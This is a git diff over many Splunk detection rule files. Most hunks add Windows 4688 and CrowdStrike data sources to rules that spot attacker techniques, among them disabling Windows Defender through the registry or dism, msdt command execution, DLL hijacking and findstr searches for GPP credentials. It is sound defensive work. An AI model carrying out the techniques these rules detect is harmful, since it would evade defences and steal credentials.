   to mitigate potential ransomware attacks.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="dcrypt.exe"
   OR Processes.original_file_name=dcinst.exe) by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/windows_diskshadow_proxy_execution.yml b/detections/endpoint/windows_diskshadow_proxy_execution.yml
index dcfe3f0c2a..7202c0a229 100644
--- a/detections/endpoint/windows_diskshadow_proxy_execution.yml
+++ b/detections/endpoint/windows_diskshadow_proxy_execution.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of DiskShadow.exe in scripti
   execution, potentially compromising the system and allowing further malicious activities.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_diskshadow` (Processes.process=*-s*
   OR Processes.process=*/s*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/windows_dism_remove_defender.yml b/detections/endpoint/windows_dism_remove_defender.yml
index 5ebd60115e..7a3bf4d484 100644
--- a/detections/endpoint/windows_dism_remove_defender.yml
+++ b/detections/endpoint/windows_dism_remove_defender.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of `dism.exe` to remove Wind
   Windows Defender.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=dism.exe
   (Processes.process="*/online*" AND Processes.process="*/disable-feature*" AND Processes.process="*Windows-Defender*"
diff --git a/detections/endpoint/windows_dll_search_order_hijacking_with_iscsicpl.yml b/detections/endpoint/windows_dll_search_order_hijacking_with_iscsicpl.yml
index dd0dea9bce..1dde696bef 100644
--- a/detections/endpoint/windows_dll_search_order_hijacking_with_iscsicpl.yml
+++ b/detections/endpoint/windows_dll_search_order_hijacking_with_iscsicpl.yml
@@ -15,6 +15,8 @@ description: The following analytic detects DLL search order hijacking involving
   environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=iscsicpl.exe
   `windows_shells` by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/windows_dll_side_loading_process_child_of_calc.yml b/detections/endpoint/windows_dll_side_loading_process_child_of_calc.yml
index 7e98507043..7ac8024482 100644
--- a/detections/endpoint/windows_dll_side_loading_process_child_of_calc.yml
+++ b/detections/endpoint/windows_dll_side_loading_process_child_of_calc.yml
@@ -7,6 +7,8 @@ status: production
 type: Anomaly
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic identifies suspicious child processes spawned
   by calc.exe, indicative of DLL side-loading techniques. This detection leverages
   data from Endpoint Detection and Response (EDR) agents, focusing on process GUIDs,
diff --git a/detections/endpoint/windows_dns_gather_network_info.yml b/detections/endpoint/windows_dns_gather_network_info.yml
index 2837575cb7..f14d1e23fa 100644
--- a/detections/endpoint/windows_dns_gather_network_info.yml
+++ b/detections/endpoint/windows_dns_gather_network_info.yml
@@ -7,6 +7,8 @@ type: Anomaly
 status: production
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic detects the use of the dnscmd.exe command to enumerate
   DNS records. It leverages data from Endpoint Detection and Response (EDR) agents,
   focusing on process command-line executions. This activity is significant as it
diff --git a/detections/endpoint/windows_dotnet_binary_in_non_standard_path.yml b/detections/endpoint/windows_dotnet_binary_in_non_standard_path.yml
index 3592aa6915..20c4d31540 100644
--- a/detections/endpoint/windows_dotnet_binary_in_non_standard_path.yml
+++ b/detections/endpoint/windows_dotnet_binary_in_non_standard_path.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of native .NET binarie
   maintain persistence within the environment, posing a significant security risk.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Processes where NOT (Processes.process_path
   IN ("*\\Windows\\ADWS\\*","*\\Windows\\SysWOW64*", "*\\Windows\\system32*", "*\\Windows\\NetworkController\\*",
diff --git a/detections/endpoint/windows_enable_win32_scheduledjob_via_registry.yml b/detections/endpoint/windows_enable_win32_scheduledjob_via_registry.yml
index f457c864d3..97ace872e1 100644
--- a/detections/endpoint/windows_enable_win32_scheduledjob_via_registry.yml
+++ b/detections/endpoint/windows_enable_win32_scheduledjob_via_registry.yml
@@ -6,7 +6,7 @@ author: Michael Haag, Splunk
 type: Anomaly
 status: production
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: 'The following analytic detects the creation of a new DWORD value named
   "EnableAt" in the registry path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration".
diff --git a/detections/endpoint/windows_execute_arbitrary_commands_with_msdt.yml b/detections/endpoint/windows_execute_arbitrary_commands_with_msdt.yml
index 698fe4bfd8..bbf533cf75 100644
--- a/detections/endpoint/windows_execute_arbitrary_commands_with_msdt.yml
+++ b/detections/endpoint/windows_execute_arbitrary_commands_with_msdt.yml
@@ -15,6 +15,8 @@ description: The following analytic detects arbitrary command execution using Wi
   persist within the environment, posing a severe security risk.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=msdt.exe
   Processes.process IN ("*msdt*","*ms-msdt:*","*ms-msdt:/id*","*ms-msdt:-id*","*/id*")
diff --git a/detections/endpoint/windows_file_without_extension_in_critical_folder.yml b/detections/endpoint/windows_file_without_extension_in_critical_folder.yml
index 53286281b3..635c1167de 100644
--- a/detections/endpoint/windows_file_without_extension_in_critical_folder.yml
+++ b/detections/endpoint/windows_file_without_extension_in_critical_folder.yml
@@ -13,7 +13,7 @@ description: The following analytic detects the creation of files without extens
   could lead to severe system compromise, including boot sector wiping, resulting
   in potential data loss and system inoperability.
 data_source:
-- Sysmon EventID 11
+- Sysmon EventID 1 AND Sysmon EventID 11 
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Filesystem
   where Filesystem.file_path IN ("*\\System32\\drivers\\*", "*\\syswow64\\drivers\\*")
   by _time span=5m Filesystem.dest Filesystem.user Filesystem.file_name Filesystem.file_path
diff --git a/detections/endpoint/windows_files_and_dirs_access_rights_modification_via_icacls.yml b/detections/endpoint/windows_files_and_dirs_access_rights_modification_via_icacls.yml
index 76c347c84d..3b1379adc0 100644
--- a/detections/endpoint/windows_files_and_dirs_access_rights_modification_via_icacls.yml
+++ b/detections/endpoint/windows_files_and_dirs_access_rights_modification_via_icacls.yml
@@ -7,6 +7,8 @@ status: production
 type: TTP
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic identifies the modification of security permissions
   on files or directories using tools like icacls.exe, cacls.exe, or xcacls.exe. It
   leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific
diff --git a/detections/endpoint/windows_findstr_gpp_discovery.yml b/detections/endpoint/windows_findstr_gpp_discovery.yml
index 92960180a5..c2d420d05b 100644
--- a/detections/endpoint/windows_findstr_gpp_discovery.yml
+++ b/detections/endpoint/windows_findstr_gpp_discovery.yml
@@ -7,6 +7,8 @@ type: TTP
 status: production
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic detects the use of the findstr command to search
   for unsecured credentials in Group Policy Preferences (GPP). It leverages data from
   Endpoint Detection and Response (EDR) agents, focusing on command-line executions
diff --git a/detections/endpoint/windows_hide_notification_features_through_registry.yml b/detections/endpoint/windows_hide_notification_features_through_registry.yml
index 27f2dd8bb8..71c42cefd0 100644
--- a/detections/endpoint/windows_hide_notification_features_through_registry.yml
+++ b/detections/endpoint/windows_hide_notification_features_through_registry.yml
@@ -13,7 +13,7 @@ description: The following analytic detects suspicious registry modifications ai
   this could prevent users from noticing critical system alerts, thereby aiding the
   attacker in maintaining persistence and furthering their malicious activities undetected.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\*"
diff --git a/detections/endpoint/windows_identify_protocol_handlers.yml b/detections/endpoint/windows_identify_protocol_handlers.yml
index 00d46a92f7..da2eb4eb95 100644
--- a/detections/endpoint/windows_identify_protocol_handlers.yml
+++ b/detections/endpoint/windows_identify_protocol_handlers.yml
@@ -14,6 +14,8 @@ description: 'The following analytic identifies the use of protocol handlers exe
   or maintain persistence within the environment, posing a significant security risk.'
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime values(Processes.process) as process values(Processes.parent_process)
   as parent_process from datamodel=Endpoint.Processes  by Processes.dest Processes.parent_process_name
diff --git a/detections/endpoint/windows_iis_components_add_new_module.yml b/detections/endpoint/windows_iis_components_add_new_module.yml
index 48273b9ffe..679feaf087 100644
--- a/detections/endpoint/windows_iis_components_add_new_module.yml
+++ b/detections/endpoint/windows_iis_components_add_new_module.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of AppCmd.exe to insta
   server.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where NOT (Processes.parent_process_name  IN
   ("msiexec.exe", "iissetup.exe")) Processes.process_name=appcmd.exe Processes.process
diff --git a/detections/endpoint/windows_impair_defense_add_xml_applocker_rules.yml b/detections/endpoint/windows_impair_defense_add_xml_applocker_rules.yml
index 210a52c970..277edfbd68 100644
--- a/detections/endpoint/windows_impair_defense_add_xml_applocker_rules.yml
+++ b/detections/endpoint/windows_impair_defense_add_xml_applocker_rules.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of a PowerShell commandlet t
   leading to further compromise and persistence within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where `process_powershell` AND Processes.process="*Import-Module Applocker*" AND
diff --git a/detections/endpoint/windows_impair_defense_change_win_defender_health_check_intervals.yml b/detections/endpoint/windows_impair_defense_change_win_defender_health_check_intervals.yml
index 40bb659bcf..c7b169a004 100644
--- a/detections/endpoint/windows_impair_defense_change_win_defender_health_check_intervals.yml
+++ b/detections/endpoint/windows_impair_defense_change_win_defender_health_check_intervals.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows registry
   that change the health check interval of Windows Defender. It leverages data from
diff --git a/detections/endpoint/windows_impair_defense_change_win_defender_quick_scan_interval.yml b/detections/endpoint/windows_impair_defense_change_win_defender_quick_scan_interval.yml
index 5f43c86c9f..8e1009bac9 100644
--- a/detections/endpoint/windows_impair_defense_change_win_defender_quick_scan_interval.yml
+++ b/detections/endpoint/windows_impair_defense_change_win_defender_quick_scan_interval.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows registry
   that change the Windows Defender Quick Scan Interval. It leverages data from the
diff --git a/detections/endpoint/windows_impair_defense_change_win_defender_throttle_rate.yml b/detections/endpoint/windows_impair_defense_change_win_defender_throttle_rate.yml
index 7112af78f7..e513ac0774 100644
--- a/detections/endpoint/windows_impair_defense_change_win_defender_throttle_rate.yml
+++ b/detections/endpoint/windows_impair_defense_change_win_defender_throttle_rate.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the ThrottleDetectionEventsRate
   registry setting in Windows Defender. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_impair_defense_change_win_defender_tracing_level.yml b/detections/endpoint/windows_impair_defense_change_win_defender_tracing_level.yml
index 1e2532cf69..0ae92aa3fc 100644
--- a/detections/endpoint/windows_impair_defense_change_win_defender_tracing_level.yml
+++ b/detections/endpoint/windows_impair_defense_change_win_defender_tracing_level.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows registry
   specifically targeting the "WppTracingLevel" setting within Windows Defender. This
diff --git a/detections/endpoint/windows_impair_defense_configure_app_install_control.yml b/detections/endpoint/windows_impair_defense_configure_app_install_control.yml
index d9c06e6d65..39802aae08 100644
--- a/detections/endpoint/windows_impair_defense_configure_app_install_control.yml
+++ b/detections/endpoint/windows_impair_defense_configure_app_install_control.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows registry
   that disable the Windows Defender SmartScreen App Install Control feature. It leverages
diff --git a/detections/endpoint/windows_impair_defense_define_win_defender_threat_action.yml b/detections/endpoint/windows_impair_defense_define_win_defender_threat_action.yml
index 209ba10f7d..e60f169f61 100644
--- a/detections/endpoint/windows_impair_defense_define_win_defender_threat_action.yml
+++ b/detections/endpoint/windows_impair_defense_define_win_defender_threat_action.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows Defender
   ThreatSeverityDefaultAction registry setting. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_impair_defense_delete_win_defender_context_menu.yml b/detections/endpoint/windows_impair_defense_delete_win_defender_context_menu.yml
index 028057a2a4..36d8922ff8 100644
--- a/detections/endpoint/windows_impair_defense_delete_win_defender_context_menu.yml
+++ b/detections/endpoint/windows_impair_defense_delete_win_defender_context_menu.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the deletion of the Windows Defender
   further malicious activities such as unauthorized access, persistence, and data
   exfiltration.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Registry where Registry.registry_path = "*\\shellex\\ContextMenuHandlers\\EPP"
diff --git a/detections/endpoint/windows_impair_defense_delete_win_defender_profile_registry.yml b/detections/endpoint/windows_impair_defense_delete_win_defender_profile_registry.yml
index d6b47becd8..15d50803ee 100644
--- a/detections/endpoint/windows_impair_defense_delete_win_defender_profile_registry.yml
+++ b/detections/endpoint/windows_impair_defense_delete_win_defender_profile_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the deletion of the Windows Defender
   ability to detect and respond to further malicious activities, thereby compromising
   endpoint security.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Registry where Registry.registry_path = "*\\Policies\\Microsoft\\Windows
diff --git a/detections/endpoint/windows_impair_defense_deny_security_software_with_applocker.yml b/detections/endpoint/windows_impair_defense_deny_security_software_with_applocker.yml
index a40b2650a8..cd90b0102d 100644
--- a/detections/endpoint/windows_impair_defense_deny_security_software_with_applocker.yml
+++ b/detections/endpoint/windows_impair_defense_deny_security_software_with_applocker.yml
@@ -14,7 +14,7 @@ description: The following analytic detects modifications in the Windows registr
   malicious, this could allow attackers to bypass security measures, facilitating
   further malicious activities and persistence within the environment.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Registry where (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group
diff --git a/detections/endpoint/windows_impair_defense_disable_controlled_folder_access.yml b/detections/endpoint/windows_impair_defense_disable_controlled_folder_access.yml
index 4fd31eb924..0ef27735e7 100644
--- a/detections/endpoint/windows_impair_defense_disable_controlled_folder_access.yml
+++ b/detections/endpoint/windows_impair_defense_disable_controlled_folder_access.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects a modification in the Windows registry
   that disables the Windows Defender Controlled Folder Access feature. It leverages
diff --git a/detections/endpoint/windows_impair_defense_disable_defender_firewall_and_network.yml b/detections/endpoint/windows_impair_defense_disable_defender_firewall_and_network.yml
index ce1d9979f6..c5f35b7a7d 100644
--- a/detections/endpoint/windows_impair_defense_disable_defender_firewall_and_network.yml
+++ b/detections/endpoint/windows_impair_defense_disable_defender_firewall_and_network.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications in the Windows registry
   to disable firewall and network protection settings within Windows Defender Security
diff --git a/detections/endpoint/windows_impair_defense_disable_defender_protocol_recognition.yml b/detections/endpoint/windows_impair_defense_disable_defender_protocol_recognition.yml
index 4ecad8e241..87916a6e12 100644
--- a/detections/endpoint/windows_impair_defense_disable_defender_protocol_recognition.yml
+++ b/detections/endpoint/windows_impair_defense_disable_defender_protocol_recognition.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows registry
   that disable the Windows Defender protocol recognition feature. It leverages data
diff --git a/detections/endpoint/windows_impair_defense_disable_pua_protection.yml b/detections/endpoint/windows_impair_defense_disable_pua_protection.yml
index 645c85539e..7801a8da16 100644
--- a/detections/endpoint/windows_impair_defense_disable_pua_protection.yml
+++ b/detections/endpoint/windows_impair_defense_disable_pua_protection.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects a modification in the Windows registry
   to disable Windows Defender PUA protection by setting PUAProtection to 0. This detection
diff --git a/detections/endpoint/windows_impair_defense_disable_realtime_signature_delivery.yml b/detections/endpoint/windows_impair_defense_disable_realtime_signature_delivery.yml
index 09bbfd21f9..be20e163d4 100644
--- a/detections/endpoint/windows_impair_defense_disable_realtime_signature_delivery.yml
+++ b/detections/endpoint/windows_impair_defense_disable_realtime_signature_delivery.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows registry
   that disable the Windows Defender real-time signature delivery feature. It leverages
diff --git a/detections/endpoint/windows_impair_defense_disable_web_evaluation.yml b/detections/endpoint/windows_impair_defense_disable_web_evaluation.yml
index ca0db28199..8b4b40941b 100644
--- a/detections/endpoint/windows_impair_defense_disable_web_evaluation.yml
+++ b/detections/endpoint/windows_impair_defense_disable_web_evaluation.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows registry
   entry "EnableWebContentEvaluation" to disable Windows Defender web content evaluation.
diff --git a/detections/endpoint/windows_impair_defense_disable_win_defender_app_guard.yml b/detections/endpoint/windows_impair_defense_disable_win_defender_app_guard.yml
index 02f4147feb..44e4b0824b 100644
--- a/detections/endpoint/windows_impair_defense_disable_win_defender_app_guard.yml
+++ b/detections/endpoint/windows_impair_defense_disable_win_defender_app_guard.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows registry
   that disable Windows Defender Application Guard auditing. It leverages data from
diff --git a/detections/endpoint/windows_impair_defense_disable_win_defender_compute_file_hashes.yml b/detections/endpoint/windows_impair_defense_disable_win_defender_compute_file_hashes.yml
index 1f6f7f35c6..2718885ddc 100644
--- a/detections/endpoint/windows_impair_defense_disable_win_defender_compute_file_hashes.yml
+++ b/detections/endpoint/windows_impair_defense_disable_win_defender_compute_file_hashes.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows registry
   that disable Windows Defender's file hash computation by setting the EnableFileHashComputation
diff --git a/detections/endpoint/windows_impair_defense_disable_win_defender_gen_reports.yml b/detections/endpoint/windows_impair_defense_disable_win_defender_gen_reports.yml
index 13250a24ee..f9ba1e6b7a 100644
--- a/detections/endpoint/windows_impair_defense_disable_win_defender_gen_reports.yml
+++ b/detections/endpoint/windows_impair_defense_disable_win_defender_gen_reports.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications in the Windows registry
   to disable Windows Defender generic reports. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_impair_defense_disable_win_defender_network_protection.yml b/detections/endpoint/windows_impair_defense_disable_win_defender_network_protection.yml
index 3829d5bca7..2e972eba4f 100644
--- a/detections/endpoint/windows_impair_defense_disable_win_defender_network_protection.yml
+++ b/detections/endpoint/windows_impair_defense_disable_win_defender_network_protection.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows registry
   that disable Windows Defender Network Protection. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_impair_defense_disable_win_defender_report_infection.yml b/detections/endpoint/windows_impair_defense_disable_win_defender_report_infection.yml
index 7796d1d06b..3451fb7079 100644
--- a/detections/endpoint/windows_impair_defense_disable_win_defender_report_infection.yml
+++ b/detections/endpoint/windows_impair_defense_disable_win_defender_report_infection.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows registry
   that disable Windows Defender's infection reporting. It leverages data from the
diff --git a/detections/endpoint/windows_impair_defense_disable_win_defender_scan_on_update.yml b/detections/endpoint/windows_impair_defense_disable_win_defender_scan_on_update.yml
index e01d1f1143..fb4aeb7f7e 100644
--- a/detections/endpoint/windows_impair_defense_disable_win_defender_scan_on_update.yml
+++ b/detections/endpoint/windows_impair_defense_disable_win_defender_scan_on_update.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows registry
   that disable the Windows Defender Scan On Update feature. It leverages data from
diff --git a/detections/endpoint/windows_impair_defense_disable_win_defender_signature_retirement.yml b/detections/endpoint/windows_impair_defense_disable_win_defender_signature_retirement.yml
index cf9d08115b..103c913657 100644
--- a/detections/endpoint/windows_impair_defense_disable_win_defender_signature_retirement.yml
+++ b/detections/endpoint/windows_impair_defense_disable_win_defender_signature_retirement.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows registry
   that disable Windows Defender Signature Retirement. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_impair_defense_overide_win_defender_phishing_filter.yml b/detections/endpoint/windows_impair_defense_overide_win_defender_phishing_filter.yml
index db2f560571..bd97134d0a 100644
--- a/detections/endpoint/windows_impair_defense_overide_win_defender_phishing_filter.yml
+++ b/detections/endpoint/windows_impair_defense_overide_win_defender_phishing_filter.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows registry
   that disable the Windows Defender phishing filter. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_impair_defense_override_smartscreen_prompt.yml b/detections/endpoint/windows_impair_defense_override_smartscreen_prompt.yml
index 741c72ce63..1eaf1df99c 100644
--- a/detections/endpoint/windows_impair_defense_override_smartscreen_prompt.yml
+++ b/detections/endpoint/windows_impair_defense_override_smartscreen_prompt.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows registry
   that override the Windows Defender SmartScreen prompt. It leverages data from the
diff --git a/detections/endpoint/windows_impair_defense_set_win_defender_smart_screen_level_to_warn.yml b/detections/endpoint/windows_impair_defense_set_win_defender_smart_screen_level_to_warn.yml
index d2d8e1b17b..f56729718e 100644
--- a/detections/endpoint/windows_impair_defense_set_win_defender_smart_screen_level_to_warn.yml
+++ b/detections/endpoint/windows_impair_defense_set_win_defender_smart_screen_level_to_warn.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows registry
   that set the Windows Defender SmartScreen level to "warn." This detection leverages
diff --git a/detections/endpoint/windows_impair_defenses_disable_hvci.yml b/detections/endpoint/windows_impair_defenses_disable_hvci.yml
index 74a15ee529..47402295cb 100644
--- a/detections/endpoint/windows_impair_defenses_disable_hvci.yml
+++ b/detections/endpoint/windows_impair_defenses_disable_hvci.yml
@@ -6,7 +6,7 @@ author: Michael Haag, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects the disabling of Hypervisor-protected
   Code Integrity (HVCI) by monitoring changes in the Windows registry. It leverages
diff --git a/detections/endpoint/windows_impair_defenses_disable_win_defender_auto_logging.yml b/detections/endpoint/windows_impair_defenses_disable_win_defender_auto_logging.yml
index e3649c03d7..5c325b9018 100644
--- a/detections/endpoint/windows_impair_defenses_disable_win_defender_auto_logging.yml
+++ b/detections/endpoint/windows_impair_defenses_disable_win_defender_auto_logging.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the disabling of Windows Defender lo
   making it harder to detect further malicious actions and maintain persistence on
   the compromised endpoint.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Registry where (Registry.registry_path = "*WMI\\Autologger\\DefenderApiLogger\\Start"
diff --git a/detections/endpoint/windows_indicator_removal_via_rmdir.yml b/detections/endpoint/windows_indicator_removal_via_rmdir.yml
index d5143ea681..63df9d0661 100644
--- a/detections/endpoint/windows_indicator_removal_via_rmdir.yml
+++ b/detections/endpoint/windows_indicator_removal_via_rmdir.yml
@@ -7,6 +7,8 @@ status: production
 type: Anomaly
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic detects the execution of the 'rmdir' command with
   '/s' and '/q' options to delete files and directory trees. This detection leverages
   data from Endpoint Detection and Response (EDR) agents, focusing on command-line
diff --git a/detections/endpoint/windows_indirect_command_execution_via_forfiles.yml b/detections/endpoint/windows_indirect_command_execution_via_forfiles.yml
index b959dc3314..489dbe3794 100644
--- a/detections/endpoint/windows_indirect_command_execution_via_forfiles.yml
+++ b/detections/endpoint/windows_indirect_command_execution_via_forfiles.yml
@@ -16,6 +16,8 @@ description: The following analytic detects the execution of programs initiated
   compromise.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process="*forfiles*
   /c *" by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name
